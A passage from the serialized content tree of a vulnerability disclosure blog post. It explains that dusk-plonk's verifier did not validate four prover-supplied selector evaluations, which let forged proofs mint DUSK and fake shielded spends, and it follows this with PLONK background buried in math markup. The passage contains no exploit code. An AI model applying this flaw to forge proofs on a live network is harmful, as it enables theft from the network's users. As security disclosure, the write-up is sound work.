91,"author":141492,"image":141493,"isFeatured":19,"onBlogPage":19,"tags":141495,"body":141498,"_type":2534,"_id":146762,"_source":2536,"_file":146763,"_stem":146764,"_extension":2539},"/blog/2026-04-30-unverified-evaluations-dusk-plonk","Unverified Evaluations in Dusk's PLONK","Dusk's privacy layer protects ~$60M of DUSK and hinges on one proof check. dusk-plonk's verifier never validated four of the prover's polynomial commitments, enough to mint DUSK from nothing and forge shielded spends the network confirmed as real.","2026-04-30T12:00:00.000Z",[107451,107452],{"src":141494,"width":17,"height":18},"/posts/dusk-commitment-issues/title.png",[141496,141497],"dusk","plonk",{"type":25,"children":141499,"toc":146742},[141500,141506,141547,141559,141565,141579,141584,141590,141881,141885,142157,142387,142393,143078,143082,143577,143585,143591,143610,143615,143621,143846,143885,143896,143902,143913,144621,144626,144629,144635,144688,144723,144755,144760,144764,144767,144773,144784,144797,144828,144895,144903,144925,144938,145365,145388,145393,145396,145401,145428,145524,145535,145582,145620,145631,145969,145986,145994,145997,146003,146008,146042,146050,146131,146134,146140,146154,146172,146177,146217,146225,146246,146249,146255,146260,146325,146339,146342,146348,146388,146399,146404,146409,146415,146429,146510,146531,146558,146561,146567,146581,146586,146591,146596,146731,146737],{"type":28,"tag":41,"props":141501,"children":141503},{"id":141502},"commitment-issues-unverified-evaluations-in-dusks-plonk",[141504],{"type":33,"value":141505},"Commitment Issues: Unverified Evaluations in Dusk's PLONK",{"type":28,"tag":29,"props":141507,"children":141508},{},[141509,141511,141518,141520,141527,141529,141536,141538,141545],{"type":33,"value":141510},"We found a critical soundness vulnerability in ",{"type":28,"tag":87,"props":141512,"children":141515},{"href":141513,"rel":141514},"https://github.com/dusk-network/plonk/",[91],[141516],{"type":33,"value":141517},"dusk-plonk",{"type":33,"value":141519},", the PLONK implementation powering ",{"type":28,"tag":87,"props":141521,"children":141524},{"href":141522,"rel":141523},"https://dusk.network/",[91],[141525],{"type":33,"value":141526},"Dusk Network's",{"type":33,"value":141528}," ~$60M ",{"type":28,"tag":87,"props":141530,"children":141533},{"href":141531,"rel":141532},"https://www.coingecko.com/en/coins/dusk",[91],[141534],{"type":33,"value":141535},"market cap",{"type":33,"value":141537},". By exploiting a gap in the verification step, a malicious prover could forge verifying proofs for arbitrary false statements, bypassing every constraint in the transaction circuit. On the live ",{"type":28,"tag":87,"props":141539,"children":141542},{"href":141540,"rel":141541},"https://github.com/dusk-network/rusk",[91],[141543],{"type":33,"value":141544},"Rusk",{"type":33,"value":141546}," network, this would have enabled minting arbitrary amounts of DUSK and moving forged shielded funds through the normal Phoenix path.",{"type":28,"tag":29,"props":141548,"children":141549},{},[141550,141552,141557],{"type":33,"value":141551},"The root cause was that the prover slipped four public selector evaluations into the proof struct, and the verifier consumed them in its final equation ",{"type":28,"tag":4995,"props":141553,"children":141554},{},[141555],{"type":33,"value":141556},"without ever validating them against the trusted commitments in the verifier key.",{"type":33,"value":141558}," The prover can set them to whatever values make the equation pass.",{"type":28,"tag":63,"props":141560,"children":141562},{"id":141561},"how-plonk-works-briefly",[141563],{"type":33,"value":141564},"How PLONK works (briefly)",{"type":28,"tag":29,"props":141566,"children":141567},{},[141568,141570,141577],{"type":33,"value":141569},"For a rigorous treatment see the ",{"type":28,"tag":87,"props":141571,"children":141574},{"href":141572,"rel":141573},"https://eprint.iacr.org/2019/953",[91],[141575],{"type":33,"value":141576},"original paper",{"type":33,"value":141578},"; what follows covers only the parts needed to understand the bug.",{"type":28,"tag":29,"props":141580,"children":141581},{},[141582],{"type":33,"value":141583},"A prover wants to convince a verifier that it knows secret inputs satisfying some computation (an arithmetic circuit) without revealing those inputs, and the resulting proof should be short and quick to verify.",{"type":28,"tag":75,"props":141585,"children":141587},{"id":141586},"arithmetic-circuits-and-constraints",[141588],{"type":33,"value":141589},"Arithmetic circuits and constraints",{"type":28,"tag":29,"props":141591,"children":141592},{},[141593,141595,141644,141646,141795,141797,141880],{"type":33,"value":141594},"An arithmetic circuit is a series of addition and multiplication gates wired together. An example would be proving that we know of some point ",{"type":28,"tag":98,"props":141596,"children":141598},{"className":141597},[3652,3653],[141599],{"type":28,"tag":116,"props":141600,"children":141602},{"className":141601},[3658],[141603],{"type":28,"tag":116,"props":141604,"children":141606},{"className":141605,"ariaHidden":3664},[3663],[141607],{"type":28,"tag":116,"props":141608,"children":141610},{"className":141609},[3669],[141611,141615,141620,141625,141630,141634,141639],{"type":28,"tag":116,"props":141612,"children":141614},{"className":141613,"style":3780},[3674],[],{"type":28,"tag":116,"props":141616,"children":141618},{"className":141617},[21380],[141619],{"type":33,"value":313},{"type":28,"tag":116,"props":141621,"children":141623},{"className":141622},[3680,21251],[141624],{"type":33,"value":18939},{"type":28,"tag":116,"props":141626,"children":141628},{"className":141627},[3791],[141629],{"type":33,"value":3794},{"type":28,"tag":116,"props":141631,"children":141633},{"className":141632,"style":3798},[3759],[],{"type":28,"tag":116,"props":141635,"children":141637},{"className":141636,"style":93149},[3680,21251],[141638],{"type":33,"value":2785},{"type":28,"tag":116,"props":141640,"children":141642},{"className":141641},[21401],[141643],{"type":33,"value":1829},{"type":33,"value":141645}," on an elliptic curve, by e.g proving that ",{"type":28,"tag":98,"props":141647,"children":141649},{"className":141648},[3652,3653],[141650],{"type":28,"tag":116,"props":141651,"children":141653},{"className":141652},[3658],[141654],{"type":28,"tag":116,"props":141655,"children":141657},{"className":141656,"ariaHidden":3664},[3663],[141658,141720,141782],{"type":28,"tag":116,"props":141659,"children":141661},{"className":141660},[3669],[141662,141666,141707,141711,141716],{"type":28,"tag":116,"props":141663,"children":141665},{"className":141664,"style":122997},[3674],[],{"type":28,"tag":116,"props":141667,"children":141669},{"className":141668},[3680],[141670,141675],{"type":28,"tag":116,"props":141671,"children":141673},{"className":141672,"style":93149},[3680,21251],[141674],{"type":33,"value":2785},{"type":28,"tag":116,"props":141676,"children":141678},{"className":141677},[3695],[141679],{"type":28,"tag":116,"props":141680,"children":141682},{"className":141681},[3700],[141683],{"type":28,"tag":116,"props":141684,"children":141686},{"className":141685},[3705],[141687],{"type":28,"tag":116,"props":141688,"children":141690},{"className":141689,"style":3675},[3710],[141691],{"type":28,"tag":116,"props":141692,"children":141693},{"style":3714},[141694,141698],{"type":28,"tag":116,"props":141695,"children":141697},{"className":141696,"style":3720},[3719],[],{"type":28,"tag":116,"props":141699,"children":141701},{"className":141700},[3725,3726,3727,3728],[141702],{"type":28,"tag":116,"props":141703,"children":141705},{"className":141704},[3680,3728],[141706],{"type":33,"value":2794},{"type":28,"tag":116,"props":141708,"children":141710},{"className":141709,"style":3857},[3759],[],{"type":28,"tag":116,"props":141712,"children":141714},{"className":141713},[3862],[141715],{"type":33,"value":373},{"type":28,"tag":116,"props":141717,"children":141719},{"className":141718,"style":3857},[3759],[],{"type":28,"tag":116,"props":141721,"children":141723},{"className":141722},[3669],[141724,141728,141769,141773,141778],{"type":28,"tag":116,"props":141725,"children":141727},{"className":141726,"style":122872},[3674],[],{"type":28,"tag":116,"props":141729,"children":141731},{"className":141730},[3680],[141732,141737],{"type":28,"tag":116,"props":141733,"children":141735},{"className":141734},[3680,21251],[141736],{"type":33,"value":18939},{"type":28,"tag":116,"props":141738,"children":141740},{"className":141739},[3695],[141741],{"type":28,"tag":116,"props":141742,"children":141744},{"className":141743},[3700],[141745],{"type":28,"tag":116,"props":141746,"children":141748},{"className":141747},[3705],[141749],{"type":28,"tag":116,"props":141750,"children":141752},{"className":141751,"style":3675},[3710],[141753],{"type":28,"tag":116,"props":141754,"children":141755},{"style":3714},[141756,141760],{"type":28,"tag":116,"props":141757,"children":141759},{"className":141758,"style":3720},[3719],[],{"type":28,"tag":116,"props":141761,"children":141763},{"className":141762},[3725,3726,3727,3728],[141764],{"type":28,"tag":116,"props":141765,"children":141767},{"className":141766},[3680,3728],[141768],{"type":33,"value":16957},{"type":28,"tag":116,"props":141770,"children":141772},{"className":141771,"style":3760},[3759],[],{"type":28,"tag":116,"props":141774,"children":141776},{"className":141775},[3765],[141777],{"type":33,"value":2268},{"type":28,"tag":116,"props":141779,"children":141781},{"className":141780,"style":3760},[3759],[],{"type":28,"tag":116,"props":141783,"children":141785},{"className":141784},[3669],[141786,141790],{"type":28,"tag":116,"props":141787,"children":141789},{"className":141788,"style":93694},[3674],[],{"type":28,"tag":116,"props":141791,"children":141793},{"className":141792},[3680],[141794],{"type":33,"value":54289},{"type":33,"value":141796},", here in ",{"type":28,"tag":98,"props":141798,"children":141800},{"className":141799},[3652,3653],[141801],{"type":28,"tag":116,"props":141802,"children":141804},{"className":141803},[3658],[141805],{"type":28,"tag":116,"props":141806,"children":141808},{"className":141807,"ariaHidden":3664},[3663],[141809],{"type":28,"tag":116,"props":141810,"children":141812},{"className":141811},[3669],[141813,141818],{"type":28,"tag":116,"props":141814,"children":141817},{"className":141815,"style":141816},[3674],"height:0.8389em;vertical-align:-0.15em;",[],{"type":28,"tag":116,"props":141819,"children":141821},{"className":141820},[3680],[141822,141827],{"type":28,"tag":116,"props":141823,"children":141825},{"className":141824},[3680,121435],[141826],{"type":33,"value":121438},{"type":28,"tag":116,"props":141828,"children":141830},{"className":141829},[3695],[141831],{"type":28,"tag":116,"props":141832,"children":141834},{"className":141833},[3700,21305],[141835,141869],{"type":28,"tag":116,"props":141836,"children":141838},{"className":141837},[3705],[141839,141864],{"type":28,"tag":116,"props":141840,"children":141842},{"className":141841,"style":92715},[3710],[141843],{"type":28,"tag":116,"props":141844,"children":141845},{"style":92719},[141846,141850],{"type":28,"tag":116,"props":141847,"children":141849},{"className":141848,"style":3720},[3719],[],{"type":28,"tag":116,"props":141851,"children":141853},{"className":141852},[3725,3726,3727,3728],[141854],{"type":28,"tag":116,"props":141855,"children":141857},{"className":141856},[3680,3728],[141858],{"type":28,"tag":116,"props":141859,"children":141861},{"className":141860},[3680,3728],[141862],{"type":33,"value":141863},"37",{"type":28,"tag":116,"props":141865,"children":141867},{"className":141866},[21407],[141868],{"type":33,"value":21410},{"type":28,"tag":116,"props":141870,"children":141872},{"className":141871},[3705],[141873],{"type":28,"tag":116,"props":141874,"children":141876},{"className":141875,"style":92746},[3710],[141877],{"type":28,"tag":116,"props":141878,"children":141879},{},[],{"type":33,"value":141},{"type":28,"tag":141882,"props":141883,"children":141884},"arithmetic-circuit-widget",{},[],{"type":28,"tag":29,"props":141886,"children":141887},{},[141888,141890,141916,141918,141997,141999,142076,142078,142155],{"type":33,"value":141889},"Each gate ",{"type":28,"tag":98,"props":141891,"children":141893},{"className":141892},[3652,3653],[141894],{"type":28,"tag":116,"props":141895,"children":141897},{"className":141896},[3658],[141898],{"type":28,"tag":116,"props":141899,"children":141901},{"className":141900,"ariaHidden":3664},[3663],[141902],{"type":28,"tag":116,"props":141903,"children":141905},{"className":141904},[3669],[141906,141911],{"type":28,"tag":116,"props":141907,"children":141910},{"className":141908,"style":141909},[3674],"height:0.6595em;",[],{"type":28,"tag":116,"props":141912,"children":141914},{"className":141913},[3680,21251],[141915],{"type":33,"value":3408},{"type":33,"value":141917}," has a left input ",{"type":28,"tag":98,"props":141919,"children":141921},{"className":141920},[3652,3653],[141922],{"type":28,"tag":116,"props":141923,"children":141925},{"className":141924},[3658],[141926],{"type":28,"tag":116,"props":141927,"children":141929},{"className":141928,"ariaHidden":3664},[3663],[141930],{"type":28,"tag":116,"props":141931,"children":141933},{"className":141932},[3669],[141934,141939],{"type":28,"tag":116,"props":141935,"children":141938},{"className":141936,"style":141937},[3674],"height:0.8444em;vertical-align:-0.15em;",[],{"type":28,"tag":116,"props":141940,"children":141942},{"className":141941},[3680],[141943,141948],{"type":28,"tag":116,"props":141944,"children":141946},{"className":141945,"style":92675},[3680,21251],[141947],{"type":33,"value":92678},{"type":28,"tag":116,"props":141949,"children":141951},{"className":141950},[3695],[141952],{"type":28,"tag":116,"props":141953,"children":141955},{"className":141954},[3700,21305],[141956,141986],{"type":28,"tag":116,"props":141957,"children":141959},{"className":141958},[3705],[141960,141981],{"type":28,"tag":116,"props":141961,"children":141963},{"className":141962,"style":93192},[3710],[141964],{"type":28,"tag":116,"props":141965,"children":141967},{"style":141966},"top:-2.55em;margin-left:-0.0197em;margin-right:0.05em;",[141968,141972],{"type":28,"tag":116,"props":141969,"children":141971},{"className":141970,"style":3720},[3719],[],{"type":28,"tag":116,"props":141973,"children":141975},{"className":141974},[3725,3726,3727,3728],[141976],{"type":28,"tag":116,"props":141977,"children":141979},{"className":141978},[3680,21251,3728],[141980],{"type":33,"value":3408},{"type":28,"tag":116,"props":141982,"children":141984},{"className":141983},[21407],[141985],{"type":33,"value":21410},{"type":28,"tag":116,"props":141987,"children":141989},{"className":141988},[3705],[141990],{"type":28,"tag":116,"props":141991,"children":141993},{"className":141992,"style":92746},[3710],[141994],{"type":28,"tag":116,"props":141995,"children":141996},{},[],{"type":33,"value":141998},", right input ",{"type":28,"tag":98,"props":142000,"children":142002},{"className":142001},[3652,3653],[142003],{"type":28,"tag":116,"props":142004,"children":142006},{"className":142005},[3658],[142007],{"type":28,"tag":116,"props":142008,"children":142010},{"className":142009,"ariaHidden":3664},[3663],[142011],{"type":28,"tag":116,"props":142012,"children":142014},{"className":142013},[3669],[142015,142019],{"type":28,"tag":116,"props":142016,"children":142018},{"className":142017,"style":109630},[3674],[],{"type":28,"tag":116,"props":142020,"children":142022},{"className":142021},[3680],[142023,142028],{"type":28,"tag":116,"props":142024,"children":142026},{"className":142025,"style":92663},[3680,21251],[142027],{"type":33,"value":93482},{"type":28,"tag":116,"props":142029,"children":142031},{"className":142030},[3695],[142032],{"type":28,"tag":116,"props":142033,"children":142035},{"className":142034},[3700,21305],[142036,142065],{"type":28,"tag":116,"props":142037,"children":142039},{"className":142038},[3705],[142040,142060],{"type":28,"tag":116,"props":142041,"children":142043},{"className":142042,"style":93192},[3710],[142044],{"type":28,"tag":116,"props":142045,"children":142046},{"style":109659},[142047,142051],{"type":28,"tag":116,"props":142048,"children":142050},{"className":142049,"style":3720},[3719],[],{"type":28,"tag":116,"props":142052,"children":142054},{"className":142053},[3725,3726,3727,3728],[142055],{"type":28,"tag":116,"props":142056,"children":142058},{"className":142057},[3680,21251,3728],[142059],{"type":33,"value":3408},{"type":28,"tag":116,"props":142061,"children":142063},{"className":142062},[21407],[142064],{"type":33,"value":21410},{"type":28,"tag":116,"props":142066,"children":142068},{"className":142067},[3705],[142069],{"type":28,"tag":116,"props":142070,"children":142072},{"className":142071,"style":92746},[3710],[142073],{"type":28,"tag":116,"props":142074,"children":142075},{},[],{"type":33,"value":142077},", and output ",{"type":28,"tag":98,"props":142079,"children":142081},{"className":142080},[3652,3653],[142082],{"type":28,"tag":116,"props":142083,"children":142085},{"className":142084},[3658],[142086],{"type":28,"tag":116,"props":142087,"children":142089},{"className":142088,"ariaHidden":3664},[3663],[142090],{"type":28,"tag":116,"props":142091,"children":142093},{"className":142092},[3669],[142094,142098],{"type":28,"tag":116,"props":142095,"children":142097},{"className":142096,"style":109630},[3674],[],{"type":28,"tag":116,"props":142099,"children":142101},{"className":142100},[3680],[142102,142107],{"type":28,"tag":116,"props":142103,"children":142105},{"className":142104},[3680,21251],[142106],{"type":33,"value":92633},{"type":28,"tag":116,"props":142108,"children":142110},{"className":142109},[3695],[142111],{"type":28,"tag":116,"props":142112,"children":142114},{"className":142113},[3700,21305],[142115,142144],{"type":28,"tag":116,"props":142116,"children":142118},{"className":142117},[3705],[142119,142139],{"type":28,"tag":116,"props":142120,"children":142122},{"className":142121,"style":93192},[3710],[142123],{"type":28,"tag":116,"props":142124,"children":142125},{"style":92719},[142126,142130],{"type":28,"tag":116,"props":142127,"children":142129},{"className":142128,"style":3720},[3719],[],{"type":28,"tag":116,"props":142131,"children":142133},{"className":142132},[3725,3726,3727,3728],[142134],{"type":28,"tag":116,"props":142135,"children":142137},{"className":142136},[3680,21251,3728],[142138],{"type":33,"value":3408},{"type":28,"tag":116,"props":142140,"children":142142},{"className":142141},[21407],[142143],{"type":33,"value":21410},{"type":28,"tag":116,"props":142145,"children":142147},{"className":142146},[3705],[142148],{"type":28,"tag":116,"props":142149,"children":142151},{"className":142150,"style":92746},[3710],[142152],{"type":28,"tag":116,"props":142153,"children":142154},{},[],{"type":33,"value":142156},". The prover's job is to show it knows wire values that satisfy every gate.",{"type":28,"tag":29,"props":142158,"children":142159},{},[142160,142162,142167,142169,142273,142275,142378,142380,142385],{"type":33,"value":142161},"Each gate imposes a constraint, and PLONK unifies all gate types into one expression using ",{"type":28,"tag":2583,"props":142163,"children":142164},{},[142165],{"type":33,"value":142166},"selector",{"type":33,"value":142168}," values that act as switches: setting ",{"type":28,"tag":98,"props":142170,"children":142172},{"className":142171},[3652,3653],[142173],{"type":28,"tag":116,"props":142174,"children":142176},{"className":142175},[3658],[142177],{"type":28,"tag":116,"props":142178,"children":142180},{"className":142179,"ariaHidden":3664},[3663],[142181,142260],{"type":28,"tag":116,"props":142182,"children":142184},{"className":142183},[3669],[142185,142189,142247,142251,142256],{"type":28,"tag":116,"props":142186,"children":142188},{"className":142187,"style":109550},[3674],[],{"type":28,"tag":116,"props":142190,"children":142192},{"className":142191},[3680],[142193,142198],{"type":28,"tag":116,"props":142194,"children":142196},{"className":142195,"style":93149},[3680,21251],[142197],{"type":33,"value":93152},{"type":28,"tag":116,"props":142199,"children":142201},{"className":142200},[3695],[142202],{"type":28,"tag":116,"props":142203,"children":142205},{"className":142204},[3700,21305],[142206,142236],{"type":28,"tag":116,"props":142207,"children":142209},{"className":142208},[3705],[142210,142231],{"type":28,"tag":116,"props":142211,"children":142214},{"className":142212,"style":142213},[3710],"height:0.3283em;",[142215],{"type":28,"tag":116,"props":142216,"children":142217},{"style":93196},[142218,142222],{"type":28,"tag":116,"props":142219,"children":142221},{"className":142220,"style":3720},[3719],[],{"type":28,"tag":116,"props":142223,"children":142225},{"className":142224},[3725,3726,3727,3728],[142226],{"type":28,"tag":116,"props":142227,"children":142229},{"className":142228,"style":94671},[3680,21251,3728],[142230],{"type":33,"value":94674},{"type":28,"tag":116,"props":142232,"children":142234},{"className":142233},[21407],[142235],{"type":33,"value":21410},{"type":28,"tag":116,"props":142237,"children":142239},{"className":142238},[3705],[142240],{"type":28,"tag":116,"props":142241,"children":142243},{"className":142242,"style":92746},[3710],[142244],{"type":28,"tag":116,"props":142245,"children":142246},{},[],{"type":28,"tag":116,"props":142248,"children":142250},{"className":142249,"style":3857},[3759],[],{"type":28,"tag":116,"props":142252,"children":142254},{"className":142253},[3862],[142255],{"type":33,"value":373},{"type":28,"tag":116,"props":142257,"children":142259},{"className":142258,"style":3857},[3759],[],{"type":28,"tag":116,"props":142261,"children":142263},{"className":142262},[3669],[142264,142268],{"type":28,"tag":116,"props":142265,"children":142267},{"className":142266,"style":93694},[3674],[],{"type":28,"tag":116,"props":142269,"children":142271},{"className":142270},[3680],[142272],{"type":33,"value":1824},{"type":33,"value":142274}," makes a row a multiplication gate, setting ",{"type":28,"tag":98,"props":142276,"children":142278},{"className":142277},[3652,3653],[142279],{"type":28,"tag":116,"props":142280,"children":142282},{"className":142281},[3658],[142283],{"type":28,"tag":116,"props":142284,"children":142286},{"className":142285,"ariaHidden":3664},[3663],[142287,142365],{"type":28,"tag":116,"props":142288,"children":142290},{"className":142289},[3669],[142291,142295,142352,142356,142361],{"type":28,"tag":116,"props":142292,"children":142294},{"className":142293,"style":109550},[3674],[],{"type":28,"tag":116,"props":142296,"children":142298},{"className":142297},[3680],[142299,142304],{"type":28,"tag":116,"props":142300,"children":142302},{"className":142301,"style":93149},[3680,21251],[142303],{"type":33,"value":93152},{"type":28,"tag":116,"props":142305,"children":142307},{"className":142306},[3695],[142308],{"type":28,"tag":116,"props":142309,"children":142311},{"className":142310},[3700,21305],[142312,142341],{"type":28,"tag":116,"props":142313,"children":142315},{"className":142314},[3705],[142316,142336],{"type":28,"tag":116,"props":142317,"children":142319},{"className":142318,"style":142213},[3710],[142320],{"type":28,"tag":116,"props":142321,"children":142322},{"style":93196},[142323,142327],{"type":28,"tag":116,"props":142324,"children":142326},{"className":142325,"style":3720},[3719],[],{"type":28,"tag":116,"props":142328,"children":142330},{"className":142329},[3725,3726,3727,3728],[142331],{"type":28,"tag":116,"props":142332,"children":142334},{"className":142333},[3680,21251,3728],[142335],{"type":33,"value":117624},{"type":28,"tag":116,"props":142337,"children":142339},{"className":142338},[21407],[142340],{"type":33,"value":21410},{"type":28,"tag":116,"props":142342,"children":142344},{"className":142343},[3705],[142345],{"type":28,"tag":116,"props":142346,"children":142348},{"className":142347,"style":92746},[3710],[142349],{"type":28,"tag":116,"props":142350,"children":142351},{},[],{"type":28,"tag":116,"props":142353,"children":142355},{"className":142354,"style":3857},[3759],[],{"type":28,"tag":116,"props":142357,"children":142359},{"className":142358},[3862],[142360],{"type":33,"value":373},{"type":28,"tag":116,"props":142362,"children":142364},{"className":142363,"style":3857},[3759],[],{"type":28,"tag":116,"props":142366,"children":142368},{"className":142367},[3669],[142369,142373],{"type":28,"tag":116,"props":142370,"children":142372},{"className":142371,"style":93694},[3674],[],{"type":28,"tag":116,"props":142374,"children":142376},{"className":142375},[3680],[142377],{"type":33,"value":1824},{"type":33,"value":142379}," makes it contribute an addition term, and so on. The selector values define the circuit's shape and are public, known to both prover and verifier, while the wire values are the prover's secret witness. This per-row check does not ensure that wires between gates are consistent (that the output of one gate equals the input of the next); PLONK uses a separate ",{"type":28,"tag":2583,"props":142381,"children":142382},{},[142383],{"type":33,"value":142384},"permutation argument",{"type":33,"value":142386}," for that, which we will not cover here.",{"type":28,"tag":75,"props":142388,"children":142390},{"id":142389},"from-many-checks-to-one",[142391],{"type":33,"value":142392},"From many checks to one",{"type":28,"tag":29,"props":142394,"children":142395},{},[142396,142398,142403,142404,142496,142497,142589,142590,142682,142684,142689,142690,142782,142783,142875,142877,142902,142904,142929,142931,143023,143025,143050,143052,143077],{"type":33,"value":142397},"Instead of checking each gate individually, PLONK reads the execution trace column by column and uses FFT interpolation to convert each array of values to a single polynomial. The wire values become ",{"type":28,"tag":2583,"props":142399,"children":142400},{},[142401],{"type":33,"value":142402},"witness polynomials",{"type":33,"value":6129},{"type":28,"tag":98,"props":142405,"children":142407},{"className":142406},[3652,3653],[142408],{"type":28,"tag":116,"props":142409,"children":142411},{"className":142410},[3658],[142412],{"type":28,"tag":116,"props":142413,"children":142415},{"className":142414,"ariaHidden":3664},[3663],[142416],{"type":28,"tag":116,"props":142417,"children":142419},{"className":142418},[3669],[142420,142424,142481,142486,142491],{"type":28,"tag":116,"props":142421,"children":142423},{"className":142422,"style":3780},[3674],[],{"type":28,"tag":116,"props":142425,"children":142427},{"className":142426},[3680],[142428,142433],{"type":28,"tag":116,"props":142429,"children":142431},{"className":142430,"style":95017},[3680,21251],[142432],{"type":33,"value":32719},{"type":28,"tag":116,"props":142434,"children":142436},{"className":142435},[3695],[142437],{"type":28,"tag":116,"props":142438,"children":142440},{"className":142439},[3700,21305],[142441,142470],{"type":28,"tag":116,"props":142442,"children":142444},{"className":142443},[3705],[142445,142465],{"type":28,"tag":116,"props":142446,"children":142448},{"className":142447,"style":142213},[3710],[142449],{"type":28,"tag":116,"props":142450,"children":142451},{"style":95038},[142452,142456],{"type":28,"tag":116,"props":142453,"children":142455},{"className":142454,"style":3720},[3719],[],{"type":28,"tag":116,"props":142457,"children":142459},{"className":142458},[3725,3726,3727,3728],[142460],{"type":28,"tag":116,"props":142461,"children":142463},{"className":142462},[3680,21251,3728],[142464],{"type":33,"value":117624},{"type":28,"tag":116,"props":142466,"children":142468},{"className":142467},[21407],[142469],{"type":33,"value":21410},{"type":28,"tag":116,"props":142471,"children":142473},{"className":142472},[3705],[142474],{"type":28,"tag":116,"props":142475,"children":142477},{"className":142476,"style":92746},[3710],[142478],{"type":28,"tag":116,"props":142479,"children":142480},{},[],{"type":28,"tag":116,"props":142482,"children":142484},{"className":142483},[21380],[142485],{"type":33,"value":313},{"type":28,"tag":116,"props":142487,"children":142489},{"className":142488},[3680,21251],[142490],{"type":33,"value":18939},{"type":28,"tag":116,"props":142492,"children":142494},{"className":142493},[21401],[142495],{"type":33,"value":1829},{"type":33,"value":825},{"type":28,"tag":98,"props":142498,"children":142500},{"className":142499},[3652,3653],[142501],{"type":28,"tag":116,"props":142502,"children":142504},{"className":142503},[3658],[142505],{"type":28,"tag":116,"props":142506,"children":142508},{"className":142507,"ariaHidden":3664},[3663],[142509],{"type":28,"tag":116,"props":142510,"children":142512},{"className":142511},[3669],[142513,142517,142574,142579,142584],{"type":28,"tag":116,"props":142514,"children":142516},{"className":142515,"style":3780},[3674],[],{"type":28,"tag":116,"props":142518,"children":142520},{"className":142519},[3680],[142521,142526],{"type":28,"tag":116,"props":142522,"children":142524},{"className":142523,"style":95017},[3680,21251],[142525],{"type":33,"value":32719},{"type":28,"tag":116,"props":142527,"children":142529},{"className":142528},[3695],[142530],{"type":28,"tag":116,"props":142531,"children":142533},{"className":142532},[3700,21305],[142534,142563],{"type":28,"tag":116,"props":142535,"children":142537},{"className":142536},[3705],[142538,142558],{"type":28,"tag":116,"props":142539,"children":142541},{"className":142540,"style":142213},[3710],[142542],{"type":28,"tag":116,"props":142543,"children":142544},{"style":95038},[142545,142549],{"type":28,"tag":116,"props":142546,"children":142548},{"className":142547,"style":3720},[3719],[],{"type":28,"tag":116,"props":142550,"children":142552},{"className":142551},[3725,3726,3727,3728],[142553],{"type":28,"tag":116,"props":142554,"children":142556},{"className":142555,"style":122437},[3680,21251,3728],[142557],{"type":33,"value":122440},{"type":28,"tag":116,"props":142559,"children":142561},{"className":142560},[21407],[142562],{"type":33,"value":21410},{"type":28,"tag":116,"props":142564,"children":142566},{"className":142565},[3705],[142567],{"type":28,"tag":116,"props":142568,"children":142570},{"className":142569,"style":92746},[3710],[142571],{"type":28,"tag":116,"props":142572,"children":142573},{},[],{"type":28,"tag":116,"props":142575,"children":142577},{"className":142576},[21380],[142578],{"type":33,"value":313},{"type":28,"tag":116,"props":142580,"children":142582},{"className":142581},[3680,21251],[142583],{"type":33,"value":18939},{"type":28,"tag":116,"props":142585,"children":142587},{"className":142586},[21401],[142588],{"type":33,"value":1829},{"type":33,"value":825},{"type":28,"tag":98,"props":142591,"children":142593},{"className":142592},[3652,3653],[142594],{"type":28,"tag":116,"props":142595,"children":142597},{"className":142596},[3658],[142598],{"type":28,"tag":116,"props":142599,"children":142601},{"className":142600,"ariaHidden":3664},[3663],[142602],{"type":28,"tag":116,"props":142603,"children":142605},{"className":142604},[3669],[142606,142610,142667,142672,142677],{"type":28,"tag":116,"props":142607,"children":142609},{"className":142608,"style":3780},[3674],[],{"type":28,"tag":116,"props":142611,"children":142613},{"className":142612},[3680],[142614,142619],{"type":28,"tag":116,"props":142615,"children":142617},{"className":142616,"style":95017},[3680,21251],[142618],{"type":33,"value":32719},{"type":28,"tag":116,"props":142620,"children":142622},{"className":142621},[3695],[142623],{"type":28,"tag":116,"props":142624,"children":142626},{"className":142625},[3700,21305],[142627,142656],{"type":28,"tag":116,"props":142628,"children":142630},{"className":142629},[3705],[142631,142651],{"type":28,"tag":116,"props":142632,"children":142634},{"className":142633,"style":142213},[3710],[142635],{"type":28,"tag":116,"props":142636,"children":142637},{"style":95038},[142638,142642],{"type":28,"tag":116,"props":142639,"children":142641},{"className":142640,"style":3720},[3719],[],{"type":28,"tag":116,"props":142643,"children":142645},{"className":142644},[3725,3726,3727,3728],[142646],{"type":28,"tag":116,"props":142647,"children":142649},{"className":142648,"style":92663},[3680,21251,3728],[142650],{"type":33,"value":114979},{"type":28,"tag":116,"props":142652,"children":142654},{"className":142653},[21407],[142655],{"type":33,"value":21410},{"type":28,"tag":116,"props":142657,"children":142659},{"className":142658},[3705],[142660],{"type":28,"tag":116,"props":142661,"children":142663},{"className":142662,"style":92746},[3710],[142664],{"type":28,"tag":116,"props":142665,"children":142666},{},[],{"type":28,"tag":116,"props":142668,"children":142670},{"className":142669},[21380],[142671],{"type":33,"value":313},{"type":28,"tag":116,"props":142673,"children":142675},{"className":142674},[3680,21251],[142676],{"type":33,"value":18939},{"type":28,"tag":116,"props":142678,"children":142680},{"className":142679},[21401],[142681],{"type":33,"value":1829},{"type":33,"value":142683}," and the selectors become ",{"type":28,"tag":2583,"props":142685,"children":142686},{},[142687],{"type":33,"value":142688},"selector polynomials",{"type":33,"value":6129},{"type":28,"tag":98,"props":142691,"children":142693},{"className":142692},[3652,3653],[142694],{"type":28,"tag":116,"props":142695,"children":142697},{"className":142696},[3658],[142698],{"type":28,"tag":116,"props":142699,"children":142701},{"className":142700,"ariaHidden":3664},[3663],[142702],{"type":28,"tag":116,"props":142703,"children":142705},{"className":142704},[3669],[142706,142710,142767,142772,142777],{"type":28,"tag":116,"props":142707,"children":142709},{"className":142708,"style":3780},[3674],[],{"type":28,"tag":116,"props":142711,"children":142713},{"className":142712},[3680],[142714,142719],{"type":28,"tag":116,"props":142715,"children":142717},{"className":142716},[3680,21251],[142718],{"type":33,"value":76422},{"type":28,"tag":116,"props":142720,"children":142722},{"className":142721},[3695],[142723],{"type":28,"tag":116,"props":142724,"children":142726},{"className":142725},[3700,21305],[142727,142756],{"type":28,"tag":116,"props":142728,"children":142730},{"className":142729},[3705],[142731,142751],{"type":28,"tag":116,"props":142732,"children":142734},{"className":142733,"style":142213},[3710],[142735],{"type":28,"tag":116,"props":142736,"children":142737},{"style":92719},[142738,142742],{"type":28,"tag":116,"props":142739,"children":142741},{"className":142740,"style":3720},[3719],[],{"type":28,"tag":116,"props":142743,"children":142745},{"className":142744},[3725,3726,3727,3728],[142746],{"type":28,"tag":116,"props":142747,"children":142749},{"className":142748,"style":94671},[3680,21251,3728],[142750],{"type":33,"value":94674},{"type":28,"tag":116,"props":142752,"children":142754},{"className":142753},[21407],[142755],{"type":33,"val